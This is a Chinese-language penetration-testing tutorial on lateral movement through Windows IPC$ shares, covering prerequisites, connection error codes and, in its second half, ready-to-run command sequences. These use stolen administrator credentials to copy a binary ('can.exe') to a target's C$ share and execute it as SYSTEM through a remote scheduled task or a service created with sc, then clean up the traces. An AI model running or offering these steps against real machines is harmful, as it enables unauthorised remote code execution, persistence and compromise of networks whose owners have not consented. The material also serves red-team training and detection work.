IPC横向移动
目录
一、IPC介绍
IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。
通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等 操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
二、IPC利用条件
1、开启了139、445端口
ipc可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。通过139、445( Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipc连接需要139、445端口的支持。
2、管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(c$、d$、e$等和系统目录 winnt或 windows( adminS)通过ipc$,可以实现对这些默认共享目录的访问。
三、IPC连接失败原因
1、用户名或密码错误
2、目标没有打开ipc默认共享
3、不能成功连接目标的139、445端口
四、IPC连接常见错误
- 错误号5:拒绝访问
- 错误号51:Windows无法找到网络路径,即网络中存在问题。
- 错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动目标有防火
- 墙(端口过滤)
- 错误号67:找不到网络名,包括lanmanworkstation服务未启动、ipcs已被删除
- 错误号1219:提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进
- 行连接。
- 错误号1326:未知的用户名或错误的密码
- 错误号l792:试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出
- 现此情况)。
- 错误号2242:此用户的密码已经过期。例如:目标机器设置了账号管理策略,强制用户定期修改密码。
1、建立IPC连接- net use \\192.168.142.10\ipc$ "密码" /user:账户
- shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop
- schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f
- shell schtasks /create /u administrator /p admin@123 /s 192.168.142.10 /tn can /sc onstart /tr C:\Users\Administrator\Desktop\can.exe /ru system /f
- schtasks /run /s IP地址 /i /tn "计划任务名"
- shell schtasks /run /u administrator /p admin@123 /s 192.168.142.10 /i /tn "can"
- schtasks /delete /s IP地址 /tn "计划任务名" /f
- shell schtasks /delete /u administrator /p admin@123 /s 192.168.142.10 /tn "can" /f
- shell net use \\192.168.142.10 /del /y
1、建立IPC连接- net use \\192.168.142.10\ipc$ "密码" /user:账户
- shell copy C:\Users\Administrator\Desktop\can.exe \\192.168.142.10\c$\Users\Administrator\Desktop
- shell sc \\192.168.142.10 create can binpath= "cmd.exe /c C:\Users\Administrator\Desktop\can.exe"
- shell sc \\192.168.142.10 start can
- shell sc \\192.168.142.10 delete can
|
